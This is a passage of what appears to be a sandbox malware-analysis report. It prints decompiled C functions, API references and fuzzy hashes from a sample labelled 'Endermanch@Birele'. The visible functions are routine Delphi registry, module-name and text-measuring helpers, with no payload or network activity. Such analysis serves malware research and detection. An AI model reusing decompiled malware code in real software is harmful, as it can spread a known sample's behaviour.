                                                                                                                                                  					E00403ED8( &_v12, 1, 1);
                                                                                                                                                  				}
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t20 = E00403E38(_v12);
                                                                                                                                                  				RegOpenKeyExA(E004151DC(_t42, _t31), _t20, 0,  *(_t42 + 0x18),  &_v8); // executed
                                                                                                                                                  				_pop(_t39);
                                                                                                                                                  				 *[fs:eax] = _t39;
                                                                                                                                                  				_push(E00415801);
                                                                                                                                                  				return E004039AC( &_v12);
                                                                                                                                                  			}









                                                                                                                                                  0x0041577e
                                                                                                                                                  0x00415783
                                                                                                                                                  0x00415787
                                                                                                                                                  0x00415788
                                                                                                                                                  0x0041578d
                                                                                                                                                  0x00415790
                                                                                                                                                  0x00415798
                                                                                                                                                  0x004157a5
                                                                                                                                                  0x004157a9
                                                                                                                                                  0x004157b8
                                                                                                                                                  0x004157b8
                                                                                                                                                  0x004157bf
                                                                                                                                                  0x004157cf
                                                                                                                                                  0x004157df
                                                                                                                                                  0x004157e6
                                                                                                                                                  0x004157e9
                                                                                                                                                  0x004157ec
                                                                                                                                                  0x004157f9

                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004157FA), ref: 004157DF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Open
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                  • Opcode ID: da6321ca1a5460769cac36411174f0f422d1a086cda09e0fa116f1de2c7eb90d
                                                                                                                                                  • Instruction ID: 47511d12f3aef131803622a604d24f8fcd8368f09904956ba7ec79515bc67909
                                                                                                                                                  • Opcode Fuzzy Hash: da6321ca1a5460769cac36411174f0f422d1a086cda09e0fa116f1de2c7eb90d
                                                                                                                                                  • Instruction Fuzzy Hash: E2017971B00604AFD701EEA5CC51BDF7BECDB48314F50057AF445E3681DA799E448698
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00415700(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) {
                                                                                                                                                  				int _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				long _t18;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  				intOrPtr _t28;
                                                                                                                                                  				char _t33;
                                                                                                                                                  
                                                                                                                                                  				_t32 = __ecx;
                                                                                                                                                  				_t33 = __edx;
                                                                                                                                                  				_t25 = __eax;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t18 = RegQueryValueExA( *(_t25 + 4), E00403E38(__edx), 0,  &_v8, __ecx,  &_a8); // executed
                                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                                  					_v16 = _t33;
                                                                                                                                                  					_v12 = 0xb;
                                                                                                                                                  					_t28 =  *0x4186ec; // 0x4119cc
                                                                                                                                                  					E0040CDD0(_t25, _t28, 1, _t32, _t33, 0,  &_v16);
                                                                                                                                                  					E0040340C();
                                                                                                                                                  				}
                                                                                                                                                  				 *_a4 = E004150C4(_v8);
                                                                                                                                                  				return _a8;
                                                                                                                                                  			}














                                                                                                                                                  0x00415709
                                                                                                                                                  0x0041570b
                                                                                                                                                  0x0041570d
                                                                                                                                                  0x00415711
                                                                                                                                                  0x0041572b
                                                                                                                                                  0x00415732
                                                                                                                                                  0x00415734
                                                                                                                                                  0x00415737
                                                                                                                                                  0x00415741
                                                                                                                                                  0x0041574e
                                                                                                                                                  0x00415753
                                                                                                                                                  0x00415753
                                                                                                                                                  0x00415766
                                                                                                                                                  0x00415770

                                                                                                                                                  APIs
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0041572B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                  • Opcode ID: 292d9cf08de223ccc11b9e93949077ff9a3d770c15aca02e3c3024be2242dc6c
                                                                                                                                                  • Instruction ID: 8bd14ddaeae1c8616342ad069fe68d0a979596aaffdc41c8fb174ff3456db14c
                                                                                                                                                  • Opcode Fuzzy Hash: 292d9cf08de223ccc11b9e93949077ff9a3d770c15aca02e3c3024be2242dc6c
                                                                                                                                                  • Instruction Fuzzy Hash: 1F014476600208EBD700DF99DC81ADFBBACDB59314F10817BF918DB381D6359E0487A4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00415696(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
                                                                                                                                                  				char* _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				int _t11;
                                                                                                                                                  				long _t17;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				intOrPtr _t24;
                                                                                                                                                  				char _t28;
                                                                                                                                                  
                                                                                                                                                  				_v8 = __ecx;
                                                                                                                                                  				_t28 = __edx;
                                                                                                                                                  				_t21 = __eax;
                                                                                                                                                  				_t11 = E00415094(_a4);
                                                                                                                                                  				_t31 = _t11;
                                                                                                                                                  				_t17 = RegSetValueExA( *(_t21 + 4), E00403E38(__edx), 0, _t11, _v8, _a8); // executed
                                                                                                                                                  				if(_t17 != 0) {
                                                                                                                                                  					_v16 = _t28;
                                                                                                                                                  					_v12 = 0xb;
                                                                                                                                                  					_t24 =  *0x4185ec; // 0x4119d4
                                                                                                                                                  					_t17 = E0040CDD0(_t21, _t24, 1, _t28, _t31, 0,  &_v16);
                                                                                                                                                  					E0040340C();
                                                                                                                                                  				}
                                                                                                                                                  				return _t17;
                                                                                                                                                  			}















                                                                                                                                                  0x004156a1
                                                                                                                                                  0x004156a4
                                                                                                                                                  0x004156a6
                                                                                                                                                  0x004156ab
                                                                                                                                                  0x004156b0
                                                                                                                                                  0x004156c9
                                                                                                                                                  0x004156d0
                                                                                                                                                  0x004156d2
                                                                                                                                                  0x004156d5
                                                                                                                                                  0x004156df
                                                                                                                                                  0x004156ec
                                                                                                                                                  0x004156f1
                                                                                                                                                  0x004156f1
                                                                                                                                                  0x004156fc

                                                                                                                                                  APIs
                                                                                                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 004156C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                  • Opcode ID: 110583e59d283a51ccfc2e95f9fe73454536ad94bd67b7403a70ed534a2fa6e5
                                                                                                                                                  • Instruction ID: e0a30de7032ceb8ed40cdb7cb97f5139a17b202b7d43ec026f63b4ff7e1ed465
                                                                                                                                                  • Opcode Fuzzy Hash: 110583e59d283a51ccfc2e95f9fe73454536ad94bd67b7403a70ed534a2fa6e5
                                                                                                                                                  • Instruction Fuzzy Hash: 9AF03175A00104BBD700DBAEDC85AEBBBEC9B99314F048176F918DB391E6359D0187A5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00415698(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
                                                                                                                                                  				char* _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				int _t11;
                                                                                                                                                  				long _t17;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                  				char _t26;
                                                                                                                                                  
                                                                                                                                                  				_v8 = __ecx;
                                                                                                                                                  				_t26 = __edx;
                                                                                                                                                  				_t21 = __eax;
                                                                                                                                                  				_t11 = E00415094(_a4);
                                                                                                                                                  				_t27 = _t11;
                                                                                                                                                  				_t17 = RegSetValueExA( *(_t21 + 4), E00403E38(__edx), 0, _t11, _v8, _a8); // executed
                                                                                                                                                  				if(_t17 != 0) {
                                                                                                                                                  					_v16 = _t26;
                                                                                                                                                  					_v12 = 0xb;
                                                                                                                                                  					_t23 =  *0x4185ec; // 0x4119d4
                                                                                                                                                  					_t20 = E0040CDD0(_t21, _t23, 1, _t26, _t27, 0,  &_v16);
                                                                                                                                                  					E0040340C();
                                                                                                                                                  					return _t20;
                                                                                                                                                  				}
                                                                                                                                                  				return _t17;
                                                                                                                                                  			}
















                                                                                                                                                  0x004156a1
                                                                                                                                                  0x004156a4
                                                                                                                                                  0x004156a6
                                                                                                                                                  0x004156ab
                                                                                                                                                  0x004156b0
                                                                                                                                                  0x004156c9
                                                                                                                                                  0x004156d0
                                                                                                                                                  0x004156d2
                                                                                                                                                  0x004156d5
                                                                                                                                                  0x004156df
                                                                                                                                                  0x004156ec
                                                                                                                                                  0x004156f1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004156f1
                                                                                                                                                  0x004156fc

                                                                                                                                                  APIs
                                                                                                                                                  • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 004156C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                  • Opcode ID: 8ef6ea071e85192f38c534134de71ad3c6a50295a9ec61429d20e961844e585f
                                                                                                                                                  • Instruction ID: c3358207af9546fb9bb7422cc02208a2908ff03dd5fec4b9db77a928d0d4c66d
                                                                                                                                                  • Opcode Fuzzy Hash: 8ef6ea071e85192f38c534134de71ad3c6a50295a9ec61429d20e961844e585f
                                                                                                                                                  • Instruction Fuzzy Hash: D8F04475A00104BBC700DBAEDC85ADBBBEC9F99314F048176F918DB391D6359D0187A5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                  			E0041580A(intOrPtr __eax, void* __ebx) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				char _v9;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				void* _t26;
                                                                                                                                                  				intOrPtr _t27;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				void* _t32;
                                                                                                                                                  
                                                                                                                                                  				_push(__ebx);
                                                                                                                                                  				_v8 = __eax;
                                                                                                                                                  				_v16 =  *((intOrPtr*)(_v8 + 0x18));
                                                                                                                                                  				_push(_t32);
                                                                                                                                                  				_push(0x415868);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t32 + 0xfffffff4;
                                                                                                                                                  				 *((intOrPtr*)(_v8 + 0x18)) = 0x20009;
                                                                                                                                                  				_t18 = E00415774(_v8, __ebx, _t26, _t29); // executed
                                                                                                                                                  				_t23 = _t18;
                                                                                                                                                  				if(_t23 != 0) {
                                                                                                                                                  					RegCloseKey(_t23);
                                                                                                                                                  				}
                                                                                                                                                  				_v9 = _t23 != 0;
                                                                                                                                                  				_pop(_t27);
                                                                                                                                                  				 *[fs:eax] = _t27;
                                                                                                                                                  				_push(E0041586F);
                                                                                                                                                  				_t20 = _v8;
                                                                                                                                                  				 *((intOrPtr*)(_t20 + 0x18)) = _v16;
                                                                                                                                                  				return _t20;
                                                                                                                                                  			}













                                                                                                                                                  0x00415812
                                                                                                                                                  0x00415813
                                                                                                                                                  0x0041581c
                                                                                                                                                  0x00415821
                                                                                                                                                  0x00415822
                                                                                                                                                  0x00415827
                                                                                                                                                  0x0041582a
                                                                                                                                                  0x00415830
                                                                                                                                                  0x0041583a
                                                                                                                                                  0x0041583f
                                                                                                                                                  0x00415843
                                                                                                                                                  0x00415846
                                                                                                                                                  0x00415846
                                                                                                                                                  0x0041584d
                                                                                                                                                  0x00415853
                                                                                                                                                  0x00415856
                                                                                                                                                  0x00415859
                                                                                                                                                  0x0041585e
                                                                                                                                                  0x00415864
                                                                                                                                                  0x00415867

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00415774: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004157FA), ref: 004157DF
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00415868), ref: 00415846
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 47109696-0
                                                                                                                                                  • Opcode ID: e15d3b8a0ab92ca7ff597e0c8709e4cdd6bde802c9ca42345794be7b768e57dd
                                                                                                                                                  • Instruction ID: a7ada43f45fcd5a96a44a414db197a4a9e9a7bc9a05c56c6c9b0084cc350734a
                                                                                                                                                  • Opcode Fuzzy Hash: e15d3b8a0ab92ca7ff597e0c8709e4cdd6bde802c9ca42345794be7b768e57dd
                                                                                                                                                  • Instruction Fuzzy Hash: C8F06274A04704EFDB01DFA9C89199DB7F8EB88710B6244B6EC10A7351D774EE50DA54
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                  			E0041580C(intOrPtr __eax, void* __ebx, void* __edx, void* __eflags) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				char _v9;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				intOrPtr _t27;
                                                                                                                                                  				void* _t29;
                                                                                                                                                  				void* _t32;
                                                                                                                                                  
                                                                                                                                                  				_push(__ebx);
                                                                                                                                                  				_v8 = __eax;
                                                                                                                                                  				_v16 =  *((intOrPtr*)(_v8 + 0x18));
                                                                                                                                                  				_push(_t32);
                                                                                                                                                  				_push(0x415868);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t32 + 0xfffffff4;
                                                                                                                                                  				 *((intOrPtr*)(_v8 + 0x18)) = 0x20009;
                                                                                                                                                  				_t18 = E00415774(_v8, __ebx, __edx, _t29); // executed
                                                                                                                                                  				_t23 = _t18;
                                                                                                                                                  				if(_t23 != 0) {
                                                                                                                                                  					RegCloseKey(_t23);
                                                                                                                                                  				}
                                                                                                                                                  				_v9 = _t23 != 0;
                                                                                                                                                  				_pop(_t27);
                                                                                                                                                  				 *[fs:eax] = _t27;
                                                                                                                                                  				_push(E0041586F);
                                                                                                                                                  				_t20 = _v8;
                                                                                                                                                  				 *((intOrPtr*)(_t20 + 0x18)) = _v16;
                                                                                                                                                  				return _t20;
                                                                                                                                                  			}












                                                                                                                                                  0x00415812
                                                                                                                                                  0x00415813
                                                                                                                                                  0x0041581c
                                                                                                                                                  0x00415821
                                                                                                                                                  0x00415822
                                                                                                                                                  0x00415827
                                                                                                                                                  0x0041582a
                                                                                                                                                  0x00415830
                                                                                                                                                  0x0041583a
                                                                                                                                                  0x0041583f
                                                                                                                                                  0x00415843
                                                                                                                                                  0x00415846
                                                                                                                                                  0x00415846
                                                                                                                                                  0x0041584d
                                                                                                                                                  0x00415853
                                                                                                                                                  0x00415856
                                                                                                                                                  0x00415859
                                                                                                                                                  0x0041585e
                                                                                                                                                  0x00415864
                                                                                                                                                  0x00415867

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00415774: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004157FA), ref: 004157DF
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00415868), ref: 00415846
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 47109696-0
                                                                                                                                                  • Opcode ID: cc830feb8e5308027b29ff64ac4e77b8c189eaf0d8055625493bdfaaedde9ba6
                                                                                                                                                  • Instruction ID: 1cc0e00312df05a8b6d43753908d74299a530909d5072024098ec33241c67906
                                                                                                                                                  • Opcode Fuzzy Hash: cc830feb8e5308027b29ff64ac4e77b8c189eaf0d8055625493bdfaaedde9ba6
                                                                                                                                                  • Instruction Fuzzy Hash: 71F06D74A04704EFDB01DFAAC89199EB7F8EB88710B6248B6E810A7361D774EE50DA54
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00404874(void* __eax) {
                                                                                                                                                  				char _v272;
                                                                                                                                                  				intOrPtr _t14;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  				intOrPtr _t18;
                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                  
                                                                                                                                                  				_t16 = __eax;
                                                                                                                                                  				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                                                                                                  					_t3 = _t16 + 4; // 0x400000
                                                                                                                                                  					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                                                                                                                                  					_t14 = E00404AB0(_t19); // executed
                                                                                                                                                  					_t18 = _t14;
                                                                                                                                                  					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                                                                                                  					if(_t18 == 0) {
                                                                                                                                                  						_t5 = _t16 + 4; // 0x400000
                                                                                                                                                  						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t7 = _t16 + 0x10; // 0x400000
                                                                                                                                                  				return  *_t7;
                                                                                                                                                  			}








                                                                                                                                                  0x0040487c
                                                                                                                                                  0x00404882
                                                                                                                                                  0x0040488e
                                                                                                                                                  0x00404892
                                                                                                                                                  0x0040489b
                                                                                                                                                  0x004048a0
                                                                                                                                                  0x004048a2
                                                                                                                                                  0x004048a7
                                                                                                                                                  0x004048a9
                                                                                                                                                  0x004048ac
                                                                                                                                                  0x004048ac
                                                                                                                                                  0x004048a7
                                                                                                                                                  0x004048af
                                                                                                                                                  0x004048ba

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00404892
                                                                                                                                                    • Part of subcall function 00404AB0: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00404ACC
                                                                                                                                                    • Part of subcall function 00404AB0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404AEA
                                                                                                                                                    • Part of subcall function 00404AB0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404B08
                                                                                                                                                    • Part of subcall function 00404AB0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00404B26
                                                                                                                                                    • Part of subcall function 00404AB0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00404BB5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404B6F
                                                                                                                                                    • Part of subcall function 00404AB0: RegQueryValueExA.ADVAPI32(?,00404D1C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00404BB5,?,80000001), ref: 00404B8D
                                                                                                                                                    • Part of subcall function 00404AB0: RegCloseKey.ADVAPI32(?,00404BBC,00000000,00000000,00000005,00000000,00404BB5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404BAF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2796650324-0
                                                                                                                                                  • Opcode ID: 2ec057aae25fb80058faf0b953f7a0de4faf8577425390b8435543846915edec
                                                                                                                                                  • Instruction ID: 11fe788d9dea6a66111706c709e2223d29c407fabf132aa1ea3f239ebfa6af2c
                                                                                                                                                  • Opcode Fuzzy Hash: 2ec057aae25fb80058faf0b953f7a0de4faf8577425390b8435543846915edec
                                                                                                                                                  • Instruction Fuzzy Hash: 6AE06DB2A002108FDB10EE58C8C1A4733D8AF48754F044966EF54EF38AD3B8DD208BD4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                  			E0040695C(intOrPtr* __eax, void* __ebx) {
                                                                                                                                                  				intOrPtr* _t10;
                                                                                                                                                  
                                                                                                                                                  				_t15 = __eax;
                                                                                                                                                  				if(__eax != 0) {
                                                                                                                                                  					_t10 = __eax;
                                                                                                                                                  					 *0x4198a4 =  *0x4198a4 + 1;
                                                                                                                                                  					 *0x4198a8 =  *__eax; // executed
                                                                                                                                                  					E00405EB8( *__eax); // executed
                                                                                                                                                  					asm("jecxz 0xffffffed");
                                                                                                                                                  					asm("jecxz 0x7");
                                                                                                                                                  					return E00406910(_t10, _t15);
                                                                                                                                                  				}
                                                                                                                                                  				return __eax;
                                                                                                                                                  			}




                                                                                                                                                  0x0040695c
                                                                                                                                                  0x0040695f
                                                                                                                                                  0x00406962
                                                                                                                                                  0x00406963
                                                                                                                                                  0x0040696b
                                                                                                                                                  0x00406971
                                                                                                                                                  0x0040698b
                                                                                                                                                  0x00406991
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406993
                                                                                                                                                  0x00406998

                                                                                                                                                  APIs
                                                                                                                                                  • WaitMessage.USER32(?,00417277), ref: 00406978
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1058943002-0
                                                                                                                                                  • Opcode ID: f6dd98189bb2c4f1e5a5f6c7c2be82427262c139f23c65f34d1e93f07f2e28a3
                                                                                                                                                  • Instruction ID: ba5a4919db89a7eb7d77e4057884912dd4fa938e0d5046d6cb8b54f6dfa4b5c3
                                                                                                                                                  • Opcode Fuzzy Hash: f6dd98189bb2c4f1e5a5f6c7c2be82427262c139f23c65f34d1e93f07f2e28a3
                                                                                                                                                  • Instruction Fuzzy Hash: 0DE04FB41140514EC701BF6D85E0A5A3790DF4330979108BFE147BB6E2C63D6851CB6E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004081C0(void* __eax, struct tagSIZE* __ecx, int __edx, void* __edi) {
                                                                                                                                                  				int _t12;
                                                                                                                                                  				int _t14;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				CHAR** _t19;
                                                                                                                                                  
                                                                                                                                                  				_t14 = __edx;
                                                                                                                                                  				_t18 = __eax;
                                                                                                                                                  				 *_t19 = E0040602C(_t14, __ecx, E00405BD4(_t17, __edx), __edi);
                                                                                                                                                  				E00406CEC(_t18, 9);
                                                                                                                                                  				_t12 = GetTextExtentPoint32A( *(_t18 + 0x1c),  *_t19, _t14, __ecx); // executed
                                                                                                                                                  				return _t12;
                                                                                                                                                  			}








                                                                                                                                                  0x004081c0
                                                                                                                                                  0x004081c1
                                                                                                                                                  0x004081cf
                                                                                                                                                  0x004081d6
                                                                                                                                                  0x004081de
                                                                                                                                                  0x004081e4

                                                                                                                                                  APIs
                                                                                                                                                  • GetTextExtentPoint32A.GDI32(00000000,?,00000009,00000000), ref: 004081DE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExtentPoint32Text
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 223599850-0
                                                                                                                                                  • Opcode ID: b7f3194463598e5197048551cbbb6afac588e3f5a9e087ae257333be8b6ad67f
                                                                                                                                                  • Instruction ID: 12c6340e1fd5c880730e9ebfcd5e47dd65edd9fea8feb467d6a2bf18329bcbe1
                                                                                                                                                  • Opcode Fuzzy Hash: b7f3194463598e5197048551cbbb6afac588e3f5a9e087ae257333be8b6ad67f
                                                                                                                                                  • Instruction Fuzzy Hash: 4AD0C960145A216DEA537721AC02D6F2568EF40708B02442EB0417A0C3DE79A85245E9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

